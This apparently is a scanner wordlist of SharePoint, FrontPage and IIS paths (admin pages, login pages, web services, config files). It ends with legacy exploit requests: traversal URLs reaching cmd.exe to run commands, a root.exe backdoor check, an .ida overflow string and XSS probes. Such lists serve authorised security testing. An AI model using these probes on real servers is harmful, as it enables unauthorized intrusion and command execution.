/dwswsdl.aspx
/editgrp.aspx
/editnav.aspx
/ewrfind.aspx
/fldedit.aspx
/fldpick.aspx
/folders.aspx
/formedt.aspx
/grpmbrs.aspx
/indxcol.aspx
/instable.htm
/irmrept.aspx
/keyword.aspx
/lstman2.aspx
/mngdisc.aspx
/mytasks.aspx
/newlink.aspx
/profnew.aspx
/qlreord.aspx
/qstedit.aspx
/rcxform.aspx
/reghost.aspx
/reorder.aspx
/rssxslt.aspx
/selcolor.htm
/setanon.aspx
/sitepp1.aspx
/siterss.aspx
/spdisco.aspx
/spthemes.xml
/spthemes.xsd
/srchrss.aspx
/srchvis.aspx
/storman.aspx
/subedit.aspx
/success.aspx
/tnreord.aspx
/viewnew.aspx
/webperm.aspx
/wfelist.aspx
/wpprevw.aspx
/wrkstat.aspx
/wsdisco.aspx
/login/
/admin/
/log-in.asp
/log_in.asp
/users/
/accounts.asp
/relogin.html
/authuser.asp
/sysadmin.asp
/yonetim.html
/yonetici.asp
/webadmin.asp
/typo3/
/panel/
/vorud/
/vorod/
/cmsadmin.asp
/yonetici.asp
/superman.asp
/login/
/admin/
/manager.aspx
/letmein.aspx
/control.aspx
/members.aspx
/users/
/relogin.html
/relogin.aspx
/isadmin.aspx
/yonetim.html
/yonetim.aspx
/typo3/
/panel/
/vorod/
/vorud/
//author.dll
//author.log
//author.exe
/index.shtml
/aclver.aspx
/aclinv.aspx
/catman.aspx
/catpp1.aspx
/create.aspx
/filedlg.htm
/filter.aspx
/fldnew.aspx
/fontdlg.htm
/global.asax
/groups.aspx
/grpman.aspx
/grpsel.aspx
/iframe.aspx
/lstman.aspx
/menubar.htc
/mygrps.aspx
/myinfo.aspx
/mypage.aspx
/mysite.aspx
/mysubs.aspx
/newdwp.aspx
/newgrp.aspx
/newmws.aspx
/newnav.aspx
/owners.aspx
/people.aspx
/picker.aspx
/policy.aspx
/portal.aspx
/qstnew.aspx
/report.aspx
/reqacc.aspx
/schema.aspx
/shropt.aspx
/sledit.aspx
/spanon.aspx
/subnew.aspx
/topnav.aspx
/upload.aspx
/vslist.aspx
/wpeula.aspx
/wrkmng.aspx
/wswsdl.aspx
/manager.asp
/letmein.asp
/control.asp
/members.asp
/relogin.htm
/relogin.asp
/isadmin.asp
/admin1.html
/admin2.html
/yonetim.asp
/access.aspx
/sysadm.aspx
/member.aspx
/manage.aspx
/signin.aspx
/relogin.htm
/admin1.html
/admin1.aspx
/admin2.aspx
/admin2.html
/Server.aspx
/admins.aspx
/acceso.aspx
/login1.aspx
/super1.aspx
//admin.exe
//admin.dll
//shtml.exe
//users.pwd
/adovbs.inc
/asps/
/bins/
/help/
/Web.config
/author.dll
/cspp1.aspx
/cspp2.aspx
/error.aspx
/iframe.htm
/login.aspx
/owssvr.dll
/proxy.aspx
/scope.aspx
/slnew.aspx
/ssocli.dll
/srman.aspx
/usage.aspx
/web.config
/login.html
/admin.html
/access.asp
/sysadm.asp
/member.asp
/user/
/manage.asp
/signin.asp
/admin1.asp
/admin2.asp
/admin1.htm
/Server.asp
/admins.asp
/acceso.asp
/root/
/login1.asp
/super1.asp
/admin.aspx
/login.html
/login.aspx
/admin.html
/panel.aspx
/user/
/users.aspx
/check.aspx
/admin1.htm
/vorod.aspx
/vorud.aspx
/root/
/login.aspx
/super.aspx
//_fpclass
//logo.gif
//_private
/a%5c.aspx
/forum.asp
/index.php
/admin.dll
/bpcf.aspx
/copy.aspx
/error.htm
/feed.aspx
/gear.aspx
/help.aspx
/hold.aspx
/role.aspx
/shtml.dll
/spcf.aspx
/user.aspx
/admin.asp
/login.htm
/login.asp
/admin.htm
/panel.asp
/users.asp
/check.asp
/vorod.asp
/vorud.asp
/login.asp
/super.asp
/login.htm
/admin.htm
/user.aspx
/auth.aspx
//cgi-bin
/asp/
/clocktower
/OMA/
/OWA/
/_private
/dws.aspx
/irm.aspx
/menu.htc
/new.aspx
/adm/
/user.asp
/auth.asp
/usr/
/adm/
/adm.aspx
/usr/
//iisadmin
/mspress30
/publisher
/x.shtml
/adm.asp
/cp.aspx
//isadmin
//samples
//srchadm
/db/
/_admin
/cp/
/cp.asp
/cp/
/x.cfm
/x.htx
/market
/sitedirectory/_layouts/viewlsts.aspx
/vc30
/1033
/3082
/help
/searchcenter/_layouts/viewlsts.aspx
/cgi
/sps
/50
/60
/_layouts/bdcadminui/addbdcaction.aspx
/_layouts/bdcadminui/managepermissions.aspx
/_layouts/bdcadminui/viewbdcapplication.aspx
/_layouts/bdcadminui/viewbdcentity.aspx
/_layouts/variations/variationimport.aspx
/_layouts/1033/images
/mysite/_layouts/mysite.aspx
/docs/_layouts/viewlsts.aspx
/news/_layouts/viewlsts.aspx
/_layouts/accessdenied.aspx
/_layouts/aclinv.aspx
/_layouts/addcontenttypetolist.aspx
/_layouts/addcontentsource.aspx
/_layouts/addfieldfromtemplate.aspx
/_layouts/addfiletype.aspx
/_layouts/addnavigationlinkdialog.aspx
/_layouts/addrole.aspx
/_layouts/addservernamemappings.aspx
/_layouts/addwrkfl.aspx
/_layouts/adminrecyclebin.aspx
/_layouts/advsetng.aspx
/_layouts/approve.aspx
/_layouts/areacachesettings.aspx
/_layouts/areanavigationsettings.aspx
/_layouts/areatemplatesettings.aspx
/_layouts/areawelcomepage.aspx
/_layouts/aspxform.aspx
/_layouts/assetimagepicker.aspx
/_layouts/assetedithyperlink.aspx
/_layouts/assetuploader.aspx
/_layouts/assetportalbrowser.aspx
/_layouts/associatedgroups.aspx
/_layouts/assocwrkfl.aspx
/_layouts/audience_defruleedit.aspx
/_layouts/audience_edit.aspx
/_layouts/audience_main.aspx
/_layouts/audience_list.aspx
/_layouts/audience_memberlist.aspx
/_layouts/audience_view.aspx
/_layouts/audience_sched.aspx
/_layouts/auditsettings.aspx
/_layouts/avreport.aspx
/_layouts/barcodeimagefromitem.aspx
/_layouts/backlinks.aspx
/_layouts/bestbet.aspx
/_layouts/bpcf.aspx
/_layouts/bulkwrktaskhandler.aspx
/_layouts/bulkwrktaskip.aspx
/_layouts/businessdatasynchronizer.aspx
/_layouts/category.aspx
/_layouts/changecontenttypeoptionalsettings.aspx
/_layouts/changefieldorder.aspx
/_layouts/changecontenttypeorder.aspx
/_layouts/changesitemasterpage.aspx
/_layouts/checkin.aspx
/_layouts/cmsslwpaddeditgroup.aspx
/_layouts/cmsslwpeditview.aspx
/_layouts/cmsslwpaddeditlink.aspx
/_layouts/cmsslwpsortlinks.aspx
/_layouts/confirmation.aspx
/_layouts/conngps.aspx
/_layouts/containerpicker.aspx
/_layouts/contentaccessaccount.aspx
/_layouts/contenttypeconvertersettings.aspx
/_layouts/convertersettings.aspx
/_layouts/copy.aspx
/_layouts/copyresults.aspx
/_layouts/copyrole.aspx
/_layouts/copyutil.aspx
/_layouts/create.aspx
/_layouts/crawledproperty.aspx
/_layouts/createadaccount.aspx
/_layouts/createpage.aspx
/_layouts/createwebpage.aspx
/_layouts/cstwrkflip.aspx
/_layouts/createworkbook.aspx
/_layouts/createws.aspx
/_layouts/ctdmsettings.aspx
/_layouts/ctypedit.aspx
/_layouts/ctypenew.aspx
/_layouts/customizereport.aspx
/_layouts/deactivatefeature.aspx
/_layouts/deletemu.aspx
/_layouts/deleteweb.aspx
/_layouts/dladvopt.aspx
/_layouts/dmplaceholder.aspx
/_layouts/discbar.aspx
/_layouts/doctrans.aspx
/_layouts/download.aspx
/_layouts/editcontentsource.aspx
/_layouts/dynamicimageprovider.aspx
/_layouts/dws.aspx
/_layouts/editcopyinformation.aspx
/_layouts/editcrawlrule.aspx
/_layouts/editdsserver.aspx
/_layouts/editnav.aspx
/_layouts/editgrp.aspx
/_layouts/editpolicy.aspx
/_layouts/editprms.aspx
/_layouts/editprofile.aspx
/_layouts/editpropertynames.aspx
/_layouts/editproperty.aspx
/_layouts/editpropertynames2.aspx
/_layouts/editrelevancesettings.aspx
/_layouts/editrole.aspx
/_layouts/editschedule.aspx
/_layouts/editsection.aspx
/_layouts/editview.aspx
/_layouts/emaildetails.aspx
/_layouts/emailsettings.aspx
/_layouts/enhancedsearch.aspx
/_layouts/enablealerts.aspx
/_layouts/ewrcustomfilter.aspx
/_layouts/ewrfilter.aspx
/_layouts/ewrfind.aspx
/_layouts/ewrpredialog.aspx
/_layouts/ewrtop10.aspx
/_layouts/excelcellpicker.aspx
/_layouts/excelprofilepage.aspx
/_layouts/excelrenderer.aspx
/_layouts/excelserversafedataprovider.aspx
/_layouts/excelserversafedataproviders.aspx
/_layouts/excelserversettings.aspx
/_layouts/excelservertrusteddcls.aspx
/_layouts/excelservertrusteddcl.aspx
/_layouts/excelservertrustedlocations.aspx
/_layouts/excelservertrustedlocation.aspx
/_layouts/excelserveruserdefinedfunction.aspx
/_layouts/exemptpolicy.aspx
/_layouts/excelserveruserdefinedfunctions.aspx
/_layouts/feed.aspx
/_layouts/exportpolicy.aspx
/_layouts/filter.aspx
/_layouts/filtervaluespickerdialog.aspx
/_layouts/fldedit.aspx
/_layouts/fldeditex.aspx
/_layouts/fldnew.aspx
/_layouts/fldnewex.aspx
/_layouts/folders.aspx
/_layouts/fldpick.aspx
/_layouts/formedt.aspx
/_layouts/formresource.aspx
/_layouts/formserver.aspx
/_layouts/formserverattachments.aspx
/_layouts/formserverdetector.aspx
/_layouts/genericpicker.aspx
/_layouts/gear.aspx
/_layouts/getdataconnectionfile.aspx
/_layouts/getssploginfo.aspx
/_layouts/getsspscopes.aspx
/_layouts/getsspstatus.aspx
/_layouts/groups.aspx
/_layouts/help.aspx
/_layouts/helpcontent.aspx
/_layouts/helpsearch.aspx
/_layouts/holdreport.aspx
/_layouts/hold.aspx
/_layouts/htmledit.aspx
/_layouts/htmltranslate.aspx
/_layouts/htmltrredir.aspx
/_layouts/iframe.aspx
/_layouts/htmltrverify.aspx
/_layouts/importpolicy.aspx
/_layouts/indxcol.aspx
/_layouts/infopage.aspx
/_layouts/iniwrkflip.aspx
/_layouts/irm.aspx
/_layouts/irmrept.aspx
/_layouts/itemrwfassoc.aspx
/_layouts/iviewhost.aspx
/_layouts/keyword.aspx
/_layouts/labelimage.aspx
/_layouts/linkschecker.aspx
/_layouts/linkscheckerwiz.aspx
/_layouts/listcontentsources.aspx
/_layouts/listenabletargeting.aspx
/_layouts/listedit.aspx
/_layouts/listfeed.aspx
/_layouts/listgeneralsettings.aspx
/_layouts/listkeywords.aspx
/_layouts/listservernamemappings.aspx
/_layouts/listsyndication.aspx
/_layouts/logsummary.aspx
/_layouts/login.aspx
/_layouts/logviewer.aspx
/_layouts/longrunningoperationprogress.aspx
/_layouts/lroperationstatus.aspx
/_layouts/managecheckedoutfiles.aspx
/_layouts/lstsetng.aspx
/_layouts/managecontenttype.aspx
/_layouts/managecontenttypefield.aspx
/_layouts/managecopies.aspx
/_layouts/managecrawlrules.aspx
/_layouts/managedproperty.aspx
/_layouts/managefeatures.aspx
/_layouts/managefeatures.aspx?scope=site
/_layouts/managefiletypes.aspx
/_layouts/manageprivacypolicy.aspx
/_layouts/manageitemscheduling.aspx
/_layouts/manageservicepermissions.aspx
/_layouts/matchingrule.aspx
/_layouts/mcontent.aspx
/_layouts/metaweblog.aspx
/_layouts/mgrdsserver.aspx
/_layouts/mgrproperty.aspx
/_layouts/mngctype.aspx
/_layouts/mngdisc.aspx
/_layouts/mngsiteadmin.aspx
/_layouts/mngfield.aspx
/_layouts/mngsubwebs.aspx
/_layouts/mngsubwebs.aspx?view=sites
/_layouts/mtgredir.aspx
/_layouts/modwrkflip.aspx
/_layouts/mycontactlinks.aspx
/_layouts/myinfo.aspx
/_layouts/mymemberships.aspx
/_layouts/mypage.aspx
/_layouts/myquicklinks.aspx
/_layouts/mysite.aspx
/_layouts/mysiteheader.aspx
/_layouts/mysubs.aspx
/_layouts/mytasks.aspx
/_layouts/navoptions.aspx
/_layouts/new.aspx
/_layouts/newdwp.aspx
/_layouts/newgrp.aspx
/_layouts/newlink.aspx
/_layouts/newmws.aspx
/_layouts/newnav.aspx
/_layouts/newpagelayout.aspx
/_layouts/newsbweb.aspx
/_layouts/newtranslationmanagement.aspx
/_layouts/objectcachesettings.aspx
/_layouts/newvariationsite.aspx
/_layouts/nocrawlsettings.aspx
/_layouts/officialfilesetup.aspx
/_layouts/officialfilesuccess.aspx
/_layouts/osssearchresults.aspx
/_layouts/pagesettings.aspx
/_layouts/pageversioninfo.aspx
/_layouts/password.aspx
/_layouts/people.aspx?membershipgroupid=0
/_layouts/people.aspx
/_layouts/permsetup.aspx
/_layouts/personalsites.aspx
/_layouts/picker.aspx
/_layouts/pickerresult.aspx
/_layouts/pickertreeview.aspx
/_layouts/policy.aspx
/_layouts/policyconfig.aspx
/_layouts/policycts.aspx
/_layouts/policylist.aspx
/_layouts/portal.aspx
/_layouts/portalview.aspx
/_layouts/postback.formserver.aspx
/_layouts/print.formserver.aspx
/_layouts/printloader.formserver.aspx
/_layouts/prjsetng.aspx
/_layouts/profadminedit.aspx
/_layouts/profileredirect.aspx
/_layouts/profmain.aspx
/_layouts/profnew.aspx
/_layouts/profmngr.aspx
/_layouts/proxy.aspx
/_layouts/qlreord.aspx
/_layouts/publishback.aspx
/_layouts/qstnew.aspx
/_layouts/qstedit.aspx
/_layouts/quicklinks.aspx
/_layouts/quicklinksdialog.aspx
/_layouts/quicklinksdialog2.aspx
/_layouts/quiklnch.aspx
/_layouts/quicklinksdialogform.aspx
/_layouts/rcxform.aspx
/_layouts/recyclebin.aspx
/_layouts/redirect.aspx
/_layouts/redirectpage.aspx?target=%7Bsitecollectionurl%7D_catalogs/masterpage
/_layouts/redirectpage.aspx
/_layouts/reghost.aspx
/_layouts/regionalsetng.aspx
/_layouts/releasehold.aspx
/_layouts/remwrkfl.aspx
/_layouts/rellinksscopesettings.aspx
/_layouts/renderudc.aspx
/_layouts/reorder.aspx
/_layouts/reqacc.aspx
/_layouts/reqfeatures.aspx
/_layouts/reqgroup.aspx
/_layouts/reqgroupconfirm.aspx
/_layouts/resolverecipient.aspx
/_layouts/rfpxform.aspx
/_layouts/rfcxform.aspx
/_layouts/role.aspx
/_layouts/rte2ecell.aspx
/_layouts/rssxslt.aspx
/_layouts/rte2erowcolsize.aspx
/_layouts/rte2etable.aspx
/_layouts/rte2pueditor.aspx
/_layouts/runreport.aspx
/_layouts/rtedialog.aspx
/_layouts/savetmpl.aspx
/_layouts/schema.aspx
/_layouts/scope.aspx
/_layouts/scopedisplaygroup.aspx
/_layouts/scsignup.aspx
/_layouts/searchandaddtohold.aspx
/_layouts/searchreset.aspx
/_layouts/searchresultremoval.aspx
/_layouts/searchresults.aspx
/_layouts/searchsspsettings.aspx
/_layouts/selectmanagedproperty.aspx
/_layouts/selectcrawledproperty.aspx
/_layouts/selectpicture.aspx
/_layouts/selectpicture2.aspx
/_layouts/selectuser.aspx
/_layouts/sendtoofficialfile.aspx
/_layouts/setanon.aspx
/_layouts/setimport.aspx
/_layouts/setrqacc.aspx
/_layouts/settings.aspx
/_layouts/signature.formserver.aspx
/_layouts/signaturedetails.formserver.aspx
/_layouts/signaturedetailspngloader.formserver.aspx
/_layouts/signaturedetailsloader.formserver.aspx
/_layouts/signatureeula.formserver.aspx
/_layouts/sitedirectorysettings.aspx
/_layouts/sitecachesettings.aspx
/_layouts/reporting.aspx
/_layouts/sitemanager.aspx
/_layouts/sitemanager.aspx?lro=all
/_layouts/siterss.aspx
/_layouts/sitesubs.aspx
/_layouts/sledit.aspx
/_layouts/slnew.aspx
/_layouts/smtcommentsdialog.aspx
/_layouts/spcf.aspx
/_layouts/spcontnt.aspx
/_layouts/spellchecker.aspx
/_layouts/spnewdashboard.aspx
/_layouts/spsredirect.aspx
/_layouts/spusageconfig.aspx
/_layouts/spusagesite.aspx
/_layouts/spusagesiteclickthroughs.aspx
/_layouts/spusagesitehomepage.aspx
/_layouts/spusagesitereferrers.aspx
/_layouts/spusagesitesearchqueries.aspx
/_layouts/spusagesitesearchresults.aspx
/_layouts/spusagesitetoppages.aspx
/_layouts/spusagesiteusers.aspx
/_layouts/spusagesspsearchqueries.aspx
/_layouts/spusagesspsearchresults.aspx
/_layouts/spusageweb.aspx
/_layouts/spusagewebclickthroughs.aspx
/_layouts/spusagewebhomepage.aspx
/_layouts/spusagewebreferrers.aspx
/_layouts/spusagewebtoppages.aspx
/_layouts/spusagewebusers.aspx
/_layouts/srchrss.aspx
/_layouts/srchvis.aspx
/_layouts/ssologon.aspx
/_layouts/storman.aspx
/_layouts/subchoos.aspx
/_layouts/subedit.aspx
/_layouts/submitrepair.aspx
/_layouts/subnew.aspx
/_layouts/success.aspx
/_layouts/survedit.aspx
/_layouts/templatepick.aspx
/_layouts/themeweb.aspx
/_layouts/tnreord.aspx
/_layouts/toolpane.aspx
/_layouts/topnav.aspx
/_layouts/translatablesettings.aspx
/_layouts/unapprovedresources.aspx
/_layouts/updatecopies.aspx
/_layouts/updateschedule.aspx
/_layouts/upload.aspx
/_layouts/usage.aspx
/_layouts/usagedetails.aspx
/_layouts/useconfirmation.aspx
/_layouts/user.aspx
/_layouts/userdisp.aspx
/_layouts/userdisp.aspx?id=1
/_layouts/useredit.aspx
/_layouts/useredit.aspx?id=1&source=%2f%5flayouts%2fpeople%2easpx
/_layouts/variationexport.aspx
/_layouts/variationlabel.aspx
/_layouts/variationlabels.aspx
/_layouts/variationlogs.aspx
/_layouts/variationsettings.aspx
/_layouts/versiondiff.aspx
/_layouts/versions.aspx
/_layouts/viewedit.aspx
/_layouts/viewgrouppermissions.aspx
/_layouts/viewlsts.aspx
/_layouts/viewnew.aspx
/_layouts/viewscopes.aspx
/_layouts/viewscopesettings.aspx
/_layouts/viewtype.aspx
/_layouts/vsubwebs.aspx
/_layouts/webdeleted.aspx
/_layouts/webpartgallerypickerpage.aspx
/_layouts/workflow.aspx
/_layouts/wpeula.aspx
/_layouts/workspce.aspx
/_layouts/wpprevw.aspx
/_layouts/wpprevw.aspx?id=247
/_layouts/wrkmng.aspx
/_layouts/wrkstat.aspx
/_layouts/wrksetng.aspx
/_layouts/wrktaskip.aspx
/_layouts/wsrpmarkupproxy.aspx
/_layouts/xlatewfassoc.aspx
/_layouts/zoombldr.aspx
/_layouts/xlviewer.aspx
/_vti_adm/admin.asmx
/_layouts/1033
/app_globalresources
/_controltemplates
/alerts.asmx
/areaservice.asmx
/dspsts.asmx
/dws.asmx
/forms.asmx
/imaging.asmx
/lists.asmx
/meetings.asmx
/outlookadapter.asmx
/permissions.asmx
/search.asmx
/sitedata.asmx
/sites.asmx
/spscrawl.asmx
/usergroup.asmx
/userprofileservice.asmx
/versions.asmx
/views.asmx
/webpartpages.asmx
/webs.asmx
/aspnet_client
/_wpresources
/app_browsers
/wpresources
//_vti_bin
//_vti_pvt
/_app_bin
/_layouts
/_vti_bin
/_vti_pvt
/bin
/_vti_bin/shtml.dll/_vti_rpc?method=server+version%3a4%2e0%2e2%2e2611
/_vti_bin/shtml.dll/_vti_rpc
//_vti_bin/_vti_aut/author.dll
/_vti_bin/_vti_aut/author.dll?method=list+documents%3a3%2e0%2e2%2e1706&service%5fname=&listHiddenDocs=true&listExplorerDocs=true&listRecurse=false&listFiles=true&listFolders=true&listLinkInfo=true&listIncludeParent=true&listDerivedT=false&listBorders=fals
/_vti_bin/_vti_adm/admin.dll
/_vti_bin/_vti_aut/author.dll
/_layouts/reusabletextpicker.aspx
/_layouts/authenticate.aspx
//_vti_inf.html
/_vti_bin/shtml.dll
/_vti_bin/shtml.dll
/_layouts/error.aspx
//service.grp
/iisadmpwd/aexp2b.htr
/iisadmpwd/achg.htr
/iisadmpwd/aexp2.htr
/iisadmpwd/aexp.htr
/iisadmpwd/aexp3.htr
/iisadmpwd/aexp4b.htr
/iisadmpwd/aexp4.htr
/iisadmpwd/anot3.htr
/iisadmpwd/anot.htr
/null.htw?CiWebHitsFile=/default.asp%20&CiRestriction=none&CiHilite
/null.htw
/qwertypoiu.htw
/qwertypoiu.printer
/scripts/convert.bas
/scripts/no-such-file.pl
/x.htw
/x.ida
/x.ida?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=X
/x.idc
/x.idq
/x.pl
//.htaccess
//_vti_adm
//_vti_aut
//_vti_cnf
//_vti_log
//_vti_txt
/AccessPlatform/auth/clientscripts/cookies.js%20
/AccessPlatform/auth/clientscripts/login.js%20
/archi~1/
/Archi~1/
/Citrix//AccessPlatform/auth/clientscripts/cookies.js%20
/Citrix/AccessPlatform/auth/clientscripts/login.js%20
/Micros~1/
/%25NETHOOD%25/
/.printer
/progra~1
/Progra~1
/_vti_script
/_vti_txt
/WebSer~1
/_vti_adm
/_vti_aut
/_vti_inf.html%20
/bdcadminui/bdcentities.aspx%20%20%20%20%20%20%20%20%20%20%20
/bdcadminui/addbdcapplication.aspx%20%20
/bdcadminui/editbdcaction.aspx%20%20%20%20%20%20%20%20%20
/bdcadminui/bdcapplications.aspx%20%20%20%20
/bdcadminui/exportbdcapplication.aspx%20%20
/mobile/bloghome.aspx%20%20%20%20%20%20%20%20%20%20
/mobile/default.aspx%20%20%20%20%20%20%20%20%20%20%20
/mobile/delete.aspx%20%20%20%20%20%20%20%20%20%20%20%20
/mobile/dispform.aspx%20%20
/mobile/editform.aspx%20%20
/mobile/mbllists.aspx%20%20%20%20
/mobile/disppost.aspx%20%20
/mobile/mblerror.aspx%20%20
/mobile/mobileformserver.aspx%20%20
/mobile/mbllogin.aspx%20%20%20%20
/mobile/newcomment.aspx%20%20
/pages/forms/webfldr.aspx%20
/authenticate.aspx
/authenticate.aspx
/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
/bin/
/cfide/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
/_layouts/alllibs.htm
/_layouts/settings.htm
/_layouts/userinfo.htm
/_mem_bin/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
/msdac/root.exe?/c+dir
/msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
/~/%3Cscript%3Ealert('XSS')%3C/script%3E.asp
/~/%3Cscript%3Ealert('XSS')%3C/script%3E.aspx
/%3Cscript%3Ealert('XSS')%3C/script%3E.aspx
/scripts/..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir+c:%5C%5C
/scripts/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
/scripts/root.exe?/c+dir
/_vti_bin/
/_vti_bin/
/_vti_bin/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
/_vti_pvt/
/_vti_pvt/
/_layouts/1033/bin
/_layouts/1033/avreport.htm
/_layouts/1033/error.htm
/_layouts/1033/filedlg.htm
/_layouts/1033/global.asax
/_layouts/1033/fontdlg.htm
/_layouts/1033/hierarchyman.ascx
/_layouts/1033/iframe.htm
/_layouts/1033/instable.htm
/_layouts/1033/menubar.htc
/_layouts/1033/menu.htc
/_layouts/1033/selcolor.htm
/_layouts/1033/spthemes.xml
/_layouts/1033/spthemes.xsd
/_layouts/1033/stswebtemp.gif
/_layouts/1033/web.config
/_layouts/3082
/_layouts/3082/avreport.htm
/_layouts/3082/bin
/_layouts/3082/filedlg.htm
/_layouts/3082/error.htm
/_layouts/3082/fontdlg.htm
/_layouts/3082/global.asax
/_layouts/3082/hierarchyman.ascx
/_layouts/3082/iframe.htm
/_layouts/3082/instable.htm
/_layouts/3082/menu.htc
/_layouts/3082/menubar.htc
/_layouts/3082/selcolor.htm
/_layouts/3082/spthemes.xml
/_layouts/3082/spthemes.xsd
/_layouts/3082/stswebtemp.gif
/_layouts/3082/web.config
/_layouts/bdcadminui/bdcapplications.aspx%20%20%20%20
/_layouts/bdcadminui/addbdcapplication.aspx%20%20
/_layouts/bdcadminui/bdcentities.aspx%20%20%20%20%20%20%20%20%20%20%20
/_layouts/bdcadminui/editbdcaction.aspx%20%20%20%20%20%20%20%20%20
/_layouts/bdcadminui/exportbdcapplication.aspx%20%20
/_layouts/images/
/_layouts/mobile/bloghome.aspx%20%20%20%20%20%20%20%20%20%20
/_layouts/mobile/delete.aspx%20%20%20%20%20%20%20%20%20%20%20%20
/_layouts/mobile/default.aspx%20%20%20%20%20%20%20%20%20%20%20
/_layouts/mobile/dispform.aspx%20%20
/_layouts/mobile/disppost.aspx%20%20
/_layouts/mobile/editform.aspx%20%20
/_layouts/mobile/mblerror.aspx%20%20
/_layouts/mobile/mbllists.aspx%20%20%20%20
/_layouts/mobile/mbllogin.aspx%20%20%20%20
/_layouts/mobile/mobileformserver.aspx%20%20
/_layouts/mobile/newcomment.aspx%20%20
/_layouts/mobile/newform.aspx
/_layouts/mobile/newpost.aspx
/_layouts/mobile/view.aspx
/_layouts/mobile/viewcomment.aspx
/default.aspx
/Pages/default.aspx
/_layouts/settings.aspx
/_layouts/viewlsts.aspx
/_layouts/mobile/mbllists.aspx
/shared documents/forms/allitems.aspx
/_layouts/sitemanager.aspx
/_Layouts/SiteManager.aspx?lro=all
/_layouts/vsubwebs.aspx
/_layouts/mngsubwebs.aspx
/Pages/Forms/AllItems.aspx
/_layouts/PageSettings.aspx
/_layouts/mcontent.aspx
/_layouts/AdminRecycleBin.aspx
/_layouts/recyclebin.aspx
/_layouts/help.a
/_layouts/people.aspx
/_layouts/people.aspx?MembershipGroupId=0
/_layouts/groups.aspx
/_layouts/user.aspx
/_layouts/role.aspx
/_layouts/userdisp.aspx
/_layouts/userdisp.aspx?ID=1
/_layouts/useredit.aspx
/_layouts/useredit.aspx?ID=1&Source=%2F%5Flayouts%2Fpeople%2Easpx
/_layouts/aclinv.aspx
/_layouts/picker.aspx
/_layouts/newgrp.aspx
/_layouts/create.aspx
/_layouts/newsbweb.aspx
/_layouts/bpcf.aspx
/_layouts/SiteDirectorySettings.aspx
/_layouts/Policylist.aspx
/_layouts/ManageFeatures.aspx
/_layouts/ManageFeatures.aspx?Scope=Site
/_layouts/mngsiteadmin.aspx
/_layouts/storman.aspx
/_layouts/wrkmng.aspx
/_layouts/listedit.aspx
/Forms/DispForm.aspx
/Forms/EditForm.aspx
/Forms/NewForm.aspx
/Forms/Forms/AllItems.aspx
/Forms/MyItems.aspx
/_layouts/prjsetng.aspx
/_layouts/themeweb.aspx
/_layouts/AreaNavigationSettings.aspx
/_Layouts/AreaWelcomePage.aspx
/_layouts/navoptions.aspx
/_layouts/quiklnch.aspx
/_layouts/topnav.aspx
/_catalogs/wt/Forms/Common.aspx
/_Layouts/AreaTemplateSettings.aspx
/_catalogs/wp/Forms/AllItems.aspx
/_layouts/NewDwp.aspx
/_Layouts/RedirectPage.aspx?Target={SiteCollectionUrl}_catalogs/masterpage
/_catalogs/masterpage/Forms/AllItems.aspx
/_Layouts/ChangeSiteMasterPage.aspx
/_layouts/mngctype.aspx
/_layouts/mngfield.aspx
/_layouts/images/
/_layouts/1033/IMAGES
/_layouts/spcf.aspx
/_layouts/WPPrevw.aspx?ID=247
/_layouts/NewDwp.aspx
/_vti_bin/Admin.asmx
/_vti_bin/alerts.asmx
/_vti_bin/people.asmx
/_vti_bin/Permissions.asmx
/_vti_bin/Lists.asmx
/_vti_bin/dspsts.asmx
/_vti_bin/UserGroup.asmx
/_vti_bin/webpartpages.asmx
/_vti_bin/search.asmx
/_vti_bin/forms.asmx
/_vti_bin/versions.asmx
/_vti_bin/webs.asmx
/_vti_bin/Views.asmx
/_vti_bin/spsdisco.aspx
/_vti_bin/AreaService.asmx
/_vti_bin/BusinessDataCatalog.asmx
/_vti_bin/ExcelService.asmx
/_vti_bin/SharepointEmailWS.asmx
/_vti_bin/spscrawl.asmx
/_vti_bin/spsearch.asmx
/_vti_bin/UserProfileService.asmx
/_vti_bin/WebPartPages.asmx